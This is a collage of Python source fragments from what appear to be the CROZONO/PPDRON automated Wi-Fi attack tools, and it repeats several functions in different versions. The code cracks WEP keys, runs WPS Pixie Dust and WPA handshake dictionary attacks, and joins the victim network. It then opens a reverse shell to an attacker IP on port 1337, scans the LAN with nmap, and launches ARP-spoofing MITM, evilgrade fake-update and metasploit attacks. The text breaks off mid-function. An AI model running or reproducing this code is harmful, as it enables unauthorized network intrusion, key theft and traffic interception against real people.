def run(self): proc_airodump = subprocess.Popen([ 'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c', settings.TARGET_CHANNEL, '-w', 'cr0z0n0_attack', settings.INTERFACE_MON ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) info("Running an association & packet injection attack") cmd_auth = pexpect.spawn( 'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format( settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC, settings.INTERFACE_MON)) cmd_auth.logfile = open(settings.LOG_FILE, 'wb') cmd_auth.expect( ['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20) cmd_auth.close() parse_log_auth = open(settings.LOG_FILE, 'r') for line in parse_log_auth: if line.find('Association successful') != -1: info("Association successful :-) injecting packets...") parse_log_auth.close() os.remove(settings.LOG_FILE) proc_aireplay = subprocess.Popen([ 'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b', settings.TARGET_BSSID, '-h', settings.NEW_MAC, settings.INTERFACE_MON ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(settings.WEP_AIREPLAY_TIME) cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap') cmd_crack.logfile = open(settings.LOG_FILE, 'wb') cmd_crack.expect( ['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30) cmd_crack.close() parse_log_crack = open(settings.LOG_FILE, 'r') for line in parse_log_crack: wh = line.find('KEY FOUND!') if wh > -1: if 'ASCII' in line: wh2 = line.find('ASCII') key_start = 'ASCII(' key_end = line.find(')') settings.TARGET_KEY = line[wh2 + len(key_start):key_end] else: key_start = 'KEY FOUND!' key_end = line.find(']') settings.TARGET_KEY = line[wh + len(key_start):key_end].strip( ) # 13 (?) parse_log_crack.close() os.remove(settings.LOG_FILE) if settings.TARGET_KEY is None: warn("Attack failed!")
def run(self): info("Running Pixie Dust attack...") report.saveLog("Running Pixie Dust attack...") cmd_reaver = pexpect.spawn( 'reaver -i {0} -c {1} -b {2} -vv -K 1'.format( settings.INTERFACE_MON, settings.TARGET_CHANNEL, settings.TARGET_BSSID)) cmd_reaver.logfile = open(settings.LOG_FILE, 'wb') cmd_reaver.expect( ['WPA PSK:', 'WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF], 30) cmd_reaver.close() parse_log_crack = open(settings.LOG_FILE, 'r') for line in parse_log_crack: if 'WPA PSK:' in line: key_reg = re.split("('.*?')|(\".*?\")", line) key_filter = key_reg[1].replace("'", "") settings.TARGET_KEY = key_filter break parse_log_crack.close() os.remove(settings.LOG_FILE) if settings.TARGET_KEY is None: warn("Pixie Dust attack failed!") report.saveLog("Pixie Dust attack failed!")
def run(self): proc_airodump = subprocess.Popen([ 'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c', settings.TARGET_CHANNEL, '-w', 'PPDRON_attack', settings.INTERFACE_MON ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) info( "Trying to get the handshake (sending deauthentication packets...)" ) report.saveLog( "Trying to get the handshake (sending deauthentication packets...)" ) cmd_aireplay = pexpect.spawn('aireplay-ng -0 10 -a {0} {1}'.format( settings.TARGET_BSSID, settings.INTERFACE_MON)) time.sleep(10) cmd_aireplay.close() time.sleep(settings.WPA_EXPECT_HANDSHAKE_TIME) cmd_pyrit = pexpect.spawn('pyrit -r PPDRON_attack-01.cap analyze') cmd_pyrit.logfile = open(settings.LOG_FILE, 'wb') cmd_pyrit.expect(['No valid', 'good', pexpect.TIMEOUT, pexpect.EOF]) cmd_pyrit.close() handshake = True parse_log_pyrit = open(settings.LOG_FILE, 'r') for line in parse_log_pyrit: if "No valid" in line: warn("We couldn't get the handshake :-(") report.saveLog("We couldn't get the handshake :-(") handshake = False parse_log_pyrit.close() os.remove(settings.LOG_FILE) if handshake != False: info("We have something :-) Making a dictionary attack...") report.saveLog( "We have something :-) Making a dictionary attack...") cmd_crack = pexpect.spawn( 'aircrack-ng -w dictionary_wpa2 PPDRON_attack-01.cap') cmd_crack.logfile = open(settings.LOG_FILE, 'wb') cmd_crack.expect( ['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF]) cmd_crack.close() parse_log_crack = open(settings.LOG_FILE, 'r') for line in parse_log_crack: wh = line.find('KEY FOUND!') if wh > -1: key_end = line.find(']') settings.TARGET_KEY = line[wh + 13:key_end] break parse_log_crack.close() os.remove(settings.LOG_FILE) if settings.TARGET_KEY is None: warn("Dictionary attack failed!") report.saveLog("Dictionary attack failed!")
def connect(essid, key, iface_mon=None): import fcntl import struct sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) tries = 0 if iface_mon is not None: call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN) time.sleep(1) iface = get_ifaces()[0] def do_connect(): nonlocal sock nonlocal tries info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else '')) cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key)) cmd_connect.logfile = open(LOG_FILE, 'wb') cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3) cmd_connect.close() parse_log_connect = open(LOG_FILE, 'r') for line in parse_log_connect: if line.find('Error') != -1: wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w') wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n') wpa_supplicant.write('network={\n') wpa_supplicant.write('ssid="' + essid + '"\n') wpa_supplicant.write('key_mgmt=WPA-PSK\n') wpa_supplicant.write('psk="' + key.strip() + '"\n') wpa_supplicant.write('}') wpa_supplicant.close() call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN) call(['dhclient', iface, '-r'], stdout=DN, stderr=DN) call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN) call(['iwconfig', iface, 'mode', 'managed']) call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN) call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN, stderr=DN) time.sleep(2) parse_log_connect.close() os.remove(LOG_FILE) tries += 1 call(['dhclient', iface], stdout=DN, stderr=DN) time.sleep(4) do_connect() if get_current_essid(iface) != essid and tries < 5: warn('Connection to {e} failed. Retrying.'.format(e=essid)) do_connect() if get_current_essid(iface) == essid: ipaddr = socket.inet_ntoa( fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24]) info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr)) return ipaddr else: error('Could not connect to {e} after 5 tries. Aborting'.format(e=essid)) exit(1)
def connect_to_lan(): import fcntl import struct sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) tries = 0 if settings.INTERFACE_MON is not None: device_mgr.toggle_mode_monitor(False) time.sleep(1) def do_connect(): nonlocal sock nonlocal tries info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else '')) cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY)) cmd_connect.logfile = open(settings.LOG_FILE, 'wb') cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3) cmd_connect.close() parse_log_connect = open(settings.LOG_FILE, 'r') for line in parse_log_connect: if line.find('Error') != -1: wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w') wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n') wpa_supplicant.write('network={\n') wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n') wpa_supplicant.write('key_mgmt=WPA-PSK\n') wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n') wpa_supplicant.write('}') wpa_supplicant.close() subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed']) subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(2) parse_log_connect.close() os.remove(settings.LOG_FILE) tries += 1 subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(4) do_connect() if get_current_essid() != settings.TARGET_ESSID and tries < 5: warn('Connection to {e} failed. Retrying.'.format(e=settings.TARGET_ESSID)) do_connect() if get_current_essid() == settings.TARGET_ESSID: ipaddr = socket.inet_ntoa( fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24]) info('Connection to {e} succeeded! Our IP is: {i}'.format(e=settings.TARGET_ESSID, i=ipaddr)) settings.IP_LAN = ipaddr.strip() else: error('Could not connect to {e} after 5 tries. Aborting'.format(e=settings.TARGET_ESSID)) exit(1)
def logout(timeout: int): global session session.sendline('exit') r = session.expect([pexpect.EOF, 'Connection to', pexpect.TIMEOUT], timeout=timeout) if r in (0, 1): return True else: session.sendline('kill -9 $$') log.warn('Connection killed itself') return False
def set_up_logging(): global logging global session if logging is None: return if logging.get('file') is not None: # TODO: Log to file log.error('Log to file no implemented. Yet.') elif logging.get('console'): session.logfile = sys.stdout else: log.warn('Logging disabled')
def main(): banner() report.initLog() report.initReport() if not checks.check_root(): error('You need root privileges to run PPDRON!\n') report.saveLog('You need root privileges to run PPDRON!\n') generateReport() exit(1) if not checks.check_wlan_tools_dependencies(): generateReport() exit(1) args = parse_args() settings.OS_PATH = os.getcwd() settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE settings.INTERFACE = device_mgr.get_ifaces( )[0] if settings.INTERFACE is None else settings.INTERFACE settings.DELAY = args.delay if args.delay is not None else settings.DELAY settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY delay = float(settings.DELAY) * 60 time.sleep(delay) report.saveLog('PPDRON running...') info('PPDRON running...') if settings.TARGET_ESSID is not None: if settings.TARGET_KEY is not None: ap_target = None else: device_mgr.hardware_setup() ap_target = airodump.scan_targets() else: device_mgr.hardware_setup() ap_target = airodump.scan_targets() # -------------------- Infiltrate wifi ------------------------------------------------ if ap_target is not None: settings.TARGET_ESSID = ap_target.get('ESSID').strip() settings.TARGET_BSSID = ap_target.get('BSSID').strip() settings.TARGET_CHANNEL = ap_target.get('channel').strip() settings.TARGET_PRIVACY = ap_target.get('Privacy').strip() info('Target selected: ' + settings.TARGET_ESSID + ' Channel: ' + settings.TARGET_CHANNEL + ' Privacy: ' + settings.TARGET_PRIVACY) report.saveLog('Target selected: ' + settings.TARGET_ESSID + ' Channel: ' + settings.TARGET_CHANNEL + ' Privacy: ' + settings.TARGET_PRIVACY) if settings.TARGET_PRIVACY == 'WEP': report.TARGET_ATTACK = 'Fuerza bruta' info('Cracking {e} access point with WEP privacy...'.format( e=settings.TARGET_ESSID)) report.saveLog( 'Cracking {e} access point with WEP privacy...'.format( e=settings.TARGET_ESSID)) wep_modules = find_modules('wep') for wep_module in wep_modules: attack = import_module(wep_module[0]) if attack.check(): attack.setup() attack.run() if settings.TARGET_KEY is not None: info('Key found!: {k} '.format(k=settings.TARGET_KEY)) report.saveLog( 'Key found!: {k} '.format(k=settings.TARGET_KEY)) lan_mgr.save_key() break else: pass if settings.TARGET_KEY is None: error('Key not found! :-(') report.saveLog( 'Key found!: {k} '.format(k=settings.TARGET_KEY)) generateReport() exit(0) elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2WPA' or settings.TARGET_PRIVACY == 'WPA2 WPA': info('Cracking {e} access point with {p} privacy...'.format( e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY)) report.saveLog( 'Cracking {e} access point with {p} privacy...'.format( e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY)) wps = wash.wash_scan() if wps: info('WPS is enabled') report.saveLog('WPS is enabled') wps_modules = find_modules('wps') for wps_module in wps_modules: attack = import_module(wps_module[0]) if attack.check(): attack.setup() attack.run() if settings.TARGET_KEY is not None: report.TARGET_ATTACK = 'Ataque al WPS' info('Key found!: {k} '.format( k=settings.TARGET_KEY)) report.saveLog('Key found!: {k} '.format( k=settings.TARGET_KEY)) break else: pass if settings.TARGET_KEY is None: if wps: warn( 'PIN not found! :-( Running WPA/WPA2 attack modules...' ) report.saveLog( 'PIN not found! :-( Running WPA/WPA2 attack modules...' ) wpa_modules = find_modules('wpa') for wpa_module in wpa_modules: attack = import_module(wpa_module[0]) if attack.check(): attack.setup() attack.run() if settings.TARGET_KEY is not None: info('Key found!: {k} '.format( k=settings.TARGET_KEY)) report.saveLog('Key found!: {k} '.format( k=settings.TARGET_KEY)) report.TARGET_ATTACK = 'Ataque de diccionario' break else: pass if settings.TARGET_KEY is None: # still... error('Key not found! :-(') report.saveLog('Key not found! :-(') generateReport() exit(0) else: lan_mgr.save_key() else: info('Open network!') report.saveLog('Open network!') report.TARGET_ATTACK = 'Ninguno' info('PPDRON has finished! Good bye! ;)') report.saveLog('PPDRON has finished! Good bye! ;)') generateReport()
def main(): banner() if not check_root(): error('You need root privileges to run CROZONO!\n') exit(1) if not check_wlan_attacks_dependences(): exit(1) info("CROZONO running...") args = parse_args() if args.essid is not None: if args.key is not None: ap_target = False ip_lan = connect(args.essid, args.key) else: iface_mon = hardware_setup() new_mac = mac_changer(iface_mon) ap_target = scan_targets(iface_mon, args.essid) else: iface_mon = hardware_setup() new_mac = mac_changer(iface_mon) ap_target = scan_targets(iface_mon) # -------------------- Infiltrate wifi -------------------- if ap_target: target_essid = ap_target.get('ESSID').strip() target_bssid = ap_target.get('BSSID').strip() target_channel = ap_target.get('channel').strip() target_privacy = ap_target.get('Privacy').strip() info("Target selected: " + target_essid) if target_privacy == 'WEP': info("Cracking {e} access point with WEP privacy...".format(e=target_essid)) key = wep_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon) if not key: error("Key not found! :(") exit() else: info("Key found!: {k} ".format(k=key)) save_key(target_essid, key) ip_lan = connect(target_essid, key, iface_mon) elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA': info("Cracking {e} access point with {p} privacy...".format(e=target_essid, p=target_privacy)) wps = wps_check(target_bssid, iface_mon) if wps: info("WPS is enabled") key = wpa_with_wps_attack(target_bssid, target_channel, iface_mon) if not key: warn("PIN not found! Trying with conventional WPA attack...") key = wpa_attack(target_bssid, target_channel, iface_mon) else: warn("WPS is not enabled") key = wpa_attack(target_bssid, target_channel, iface_mon) if not key: error("Key not found! :(") exit() else: info("Key found!: {k} ".format(k=key)) save_key(target_essid, key) ip_lan = connect(target_essid, key, iface_mon) else: info("Open network!") ip_lan = connect(target_essid, None, iface_mon) # -------------------- Acquired LAN range -------------------- ip_lan = ip_lan.strip() net = ip_lan.split('.') range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255' # -------------------- Connect to attacker and relay nmap info -------------------- if os.path.exists(OS_PATH + '/cr0z0n0_nmap'): os.remove(OS_PATH + '/cr0z0n0_nmap') if not check_lan_attacks_dependences(): exit(1) attacker = args.dest if attacker is not None: info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=attacker)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((attacker, 1337)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) banner() info("Hello! :)") info("Executing Nmap...") call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net], stderr=DN) else: warn("Attacker not defined! Ending...") exit() # -------------------- Attacks -------------------- attack = args.attack if attack == 'sniffing-mitm': iface = get_ifaces()[0] gateway = get_gateway().strip() target_mitm = get_target_mitm(gateway, ip_lan) info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=gateway, m=target_mitm)) cmd_ettercap = pexpect.spawn( 'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=gateway, m=target_mitm, i=iface)) time.sleep(2) # cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface)) proc = subprocess.call(["tshark", "-i", iface], stderr=DN) elif attack == 'evilgrade': modules = open(OS_PATH + '/evilgrade/modules.txt', 'r') agent = OS_PATH + '/evilgrade/agent.exe' for line in modules: print(line.replace('\n', '')) print("\n\n Select module to use: ") plugin = input() info("Thank you! Evilgrade will be executed!") s.shutdown(1) if os.path.exists('/etc/ettercap/etter.dns'): call(['rm', '/etc/ettercap/etter.dns']) etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r') etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w') for line in etter_template: line = line.replace('IP', ip_lan) etter_dns.write(line) etter_dns.close() etter_template.close() call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns']) evilgrade = pexpect.spawn('evilgrade') evilgrade.expect('evilgrade>') evilgrade.sendline('configure ' + plugin) evilgrade.sendline('set agent ' + agent) evilgrade.sendline('start') time.sleep(1) iface = get_ifaces()[0] gateway = get_gateway().strip() target_mitm = get_target_mitm(gateway, ip_lan) cmd_ettercap = pexpect.spawn( 'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(g=gateway, m=target_mitm, i=iface)) time.sleep(EVILGRADE_ATTACK_TIME) elif attack == 'metasploit': info("Executing Metasploit...") proc = subprocess.call(["msfconsole"], stderr=DN) else: warn("Attack not defined!") s.shutdown(1) info("CROZONO has finished! Good bye! ;)")
def connect(essid, key, iface_mon=None): import fcntl import struct sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) tries = 0 iface = get_ifaces()[0] def do_connect(): nonlocal sock nonlocal tries info("Connecting to '{0}' with key '{1}'".format( essid, key if key is not None else '')) if iface_mon is not None: call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN) time.sleep(1) # TODO: Necessary? - yep for Raspbian. cmd_connect = pexpect.spawn( 'iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key)) cmd_connect.logfile = open(LOG_FILE, 'wb') cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3) cmd_connect.close() parse_log_connect = open(LOG_FILE, 'r') for line in parse_log_connect: if line.find('Error') != -1: wpa_supplicant = open( '/etc/wpa_supplicant/wpa_supplicant.conf', 'w') wpa_supplicant.write( 'ctrl_interface=/var/run/wpa_supplicant\n') wpa_supplicant.write('network={\n') wpa_supplicant.write('ssid="' + essid + '"\n') wpa_supplicant.write( 'key_mgmt=WPA-PSK\n' ) # TODO: Always wpa-psk? - No problem yet. wpa_supplicant.write('psk="' + key.strip() + '"\n') wpa_supplicant.write('}') wpa_supplicant.close() call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN) call(['dhclient', iface, '-r'], stdout=DN, stderr=DN) call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN) call(['iwconfig', iface, 'mode', 'managed']) call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN) call([ 'wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface ], stdout=DN, stderr=DN) time.sleep(2) parse_log_connect.close() os.remove(LOG_FILE) tries += 1 call(['dhclient', iface], stdout=DN, stderr=DN) time.sleep(4) do_connect() if get_current_essid(iface) != essid and tries < 5: warn('Connection to {e} failed. Retrying.'.format(e=essid)) do_connect() if get_current_essid(iface) == essid: ipaddr = socket.inet_ntoa( fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24]) info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr)) return ipaddr else: error( 'Could not connect to {e} after 5 tries. Aborting'.format(e=essid)) exit(1)
def main(): banner() if not check_root(): error('You need root privileges to run CROZONO!\n') exit(1) if not check_wlan_attacks_dependences(): exit(1) info("CROZONO running...") args = parse_args() if args.essid is not None: if args.key is not None: ap_target = False ip_lan = connect(args.essid, args.key) else: iface_mon = hardware_setup() new_mac = mac_changer(iface_mon) ap_target = scan_targets(iface_mon, args.essid) else: iface_mon = hardware_setup() new_mac = mac_changer(iface_mon) ap_target = scan_targets(iface_mon) # -------------------- Infiltrate wifi -------------------- if ap_target != False: target_essid = ap_target.get('ESSID').strip() target_bssid = ap_target.get('BSSID').strip() target_channel = ap_target.get('channel').strip() target_privacy = ap_target.get('Privacy').strip() info("Target selected: " + target_essid) if target_privacy == 'WEP': info("Cracking {e} access point with WEP privacy...".format( e=target_essid)) key = WEP_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon) if key == False: error("Key not found! :(") exit() else: info("Key found!: {k} ".format(k=key)) save_key(target_essid, key) ip_lan = connect(target_essid, key, iface_mon) elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA': info("Cracking {e} access point with {p} privacy...".format( e=target_essid, p=target_privacy)) WPS = WPS_check(target_bssid, iface_mon) if WPS == True: info("WPS is enabled") key = WPA_with_WPS_attack(target_bssid, target_channel, iface_mon) if key == False: warn( "PIN not found! Trying with conventional WPA attack..." ) key = WPA_attack(target_bssid, target_channel, iface_mon) else: warn("WPS is not enabled") key = WPA_attack(target_bssid, target_channel, iface_mon) if key == False: error("Key not found! :(") exit() else: info("Key found!: {k} ".format(k=key)) save_key(target_essid, key) ip_lan = connect(target_essid, key, iface_mon) else: info("Open network!") ip_lan = connect(target_essid, None, iface_mon) # -------------------- Acquired LAN range -------------------- ip_lan = ip_lan.strip() net = ip_lan.split('.') range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255' # -------------------- Connect to attacker and relay nmap info -------------------- if os.path.exists(OS_PATH + '/cr0z0n0_nmap'): os.remove(OS_PATH + '/cr0z0n0_nmap') if not check_lan_attacks_dependences(): exit(1) attacker = args.dest if attacker is not None: info( "Sending information about network to attacker ({ip}) and running attacks..." .format(ip=attacker)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((attacker, 1337)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) banner() info("Hello! :)") info("Executing Nmap...") call([ 'nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net ], stderr=DN) else: warn("Attacker not defined! Ending...") exit() # -------------------- Attacks -------------------- attack = args.attack if attack == 'sniffing-mitm': iface = get_ifaces()[0] gateway = get_gateway().strip() target_mitm = get_target_mitm(gateway, ip_lan) info("Executing MITM and Sniffing attacks between {g} and {m}...". format(g=gateway, m=target_mitm)) cmd_ettercap = pexpect.spawn( 'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format( g=gateway, m=target_mitm, i=iface)) time.sleep(2) #cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface)) proc = subprocess.call(["tshark", "-i", iface], stderr=DN) elif attack == 'evilgrade': modules = open(OS_PATH + '/evilgrade/modules.txt', 'r') agent = OS_PATH + '/evilgrade/agent.exe' for line in modules: print(line.replace('\n', '')) print("\n\n Select module to use: ") plugin = raw_input() info("Thank you! Evilgrade will be executed!") s.shutdown(1) if os.path.exists('/etc/ettercap/etter.dns'): call(['rm', '/etc/ettercap/etter.dns']) etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r') etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w') for line in etter_template: line = line.replace('IP', ip_lan) etter_dns.write(line) etter_dns.close() etter_template.close() call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns']) evilgrade = pexpect.spawn('evilgrade') evilgrade.expect('evilgrade>') evilgrade.sendline('configure ' + plugin) evilgrade.sendline('set agent ' + agent) evilgrade.sendline('start') time.sleep(1) iface = get_ifaces()[0] gateway = get_gateway().strip() target_mitm = get_target_mitm(gateway, ip_lan) cmd_ettercap = pexpect.spawn( 'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format( g=gateway, m=target_mitm, i=iface)) time.sleep(EVILGRADE_ATTACK_TIME) elif attack == 'metasploit': info("Executing Metasploit...") proc = subprocess.call(["msfconsole"], stderr=DN) else: warn("Attack not defined!") s.shutdown(1) info("CROZONO has finished! Good bye! ;)")
def connect_to_lan(): import fcntl import struct sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) tries = 0 if settings.INTERFACE_MON is not None: device_mgr.toggle_mode_monitor(False) time.sleep(1) def do_connect(): nonlocal sock nonlocal tries info("Connecting to '{0}' with key '{1}'".format( settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else '')) cmd_connect = pexpect.spawn( 'iwconfig {0} essid "{1}" key s:{2}'.format( settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY)) cmd_connect.logfile = open(settings.LOG_FILE, 'wb') cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3) cmd_connect.close() parse_log_connect = open(settings.LOG_FILE, 'r') for line in parse_log_connect: if line.find('Error') != -1: wpa_supplicant = open( '/etc/wpa_supplicant/wpa_supplicant.conf', 'w') wpa_supplicant.write( 'ctrl_interface=/var/run/wpa_supplicant\n') wpa_supplicant.write('network={\n') wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n') wpa_supplicant.write('key_mgmt=WPA-PSK\n') wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n') wpa_supplicant.write('}') wpa_supplicant.close() subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call( ['iwconfig', settings.INTERFACE, 'mode', 'managed']) subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) subprocess.call([ 'wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(2) parse_log_connect.close() os.remove(settings.LOG_FILE) tries += 1 subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(4) do_connect() if get_current_essid() != settings.TARGET_ESSID and tries < 5: warn('Connection to {e} failed. Retrying.'.format( e=settings.TARGET_ESSID)) do_connect() if get_current_essid() == settings.TARGET_ESSID: ipaddr = socket.inet_ntoa( fcntl.ioctl( sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24]) info('Connection to {e} succeeded! Our IP is: {i}'.format( e=settings.TARGET_ESSID, i=ipaddr)) settings.IP_LAN = ipaddr.strip() else: error('Could not connect to {e} after 5 tries. Aborting'.format( e=settings.TARGET_ESSID)) exit(1)
def main(): banner() if not checks.check_root(): error('You need root privileges to run CROZONO!\n') exit(1) if not checks.check_wlan_tools_dependencies(): exit(1) args = parse_args() settings.OS_PATH = os.getcwd() settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE settings.INTERFACE = device_mgr.get_ifaces( )[0] if settings.INTERFACE is None else settings.INTERFACE settings.DELAY = args.delay if args.delay is not None else settings.DELAY settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY settings.IP_ATTACKER = args.connect if args.connect is not None else settings.IP_ATTACKER settings.LAN_DISCOVERY = args.discovery if args.discovery is not None else settings.LAN_DISCOVERY settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK delay = float(settings.DELAY) * 60 time.sleep(delay) info("CROZONO running...") if settings.TARGET_ESSID is not None: if settings.TARGET_KEY is not None: ap_target = None lan_mgr.connect_to_lan() else: device_mgr.hardware_setup() ap_target = airodump.scan_targets() else: device_mgr.hardware_setup() ap_target = airodump.scan_targets() # -------------------- Infiltrate wifi ------------------------------------------------ if ap_target is not None: settings.TARGET_ESSID = ap_target.get('ESSID').strip() settings.TARGET_BSSID = ap_target.get('BSSID').strip() settings.TARGET_CHANNEL = ap_target.get('channel').strip() settings.TARGET_PRIVACY = ap_target.get('Privacy').strip() info("Target selected: " + settings.TARGET_ESSID) if settings.TARGET_PRIVACY == 'WEP': info("Cracking {e} access point with WEP privacy...".format( e=settings.TARGET_ESSID)) wep_modules = find_modules('wep') for wep_module in wep_modules: attack = import_module(wep_module[0]) if attack.check(): attack.setup() attack.run() if settings.TARGET_KEY is not None: info("Key found!: {k} ".format(k=settings.TARGET_KEY)) lan_mgr.save_key() lan_mgr.connect_to_lan() break else: pass if settings.TARGET_KEY is None: error("Key not found! :-(") exit(0) elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA': info("Cracking {e} access point with {p} privacy...".format( e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY)) wps = wash.wash_scan() if wps: info("WPS is enabled") wps_modules = find_modules('wps') for 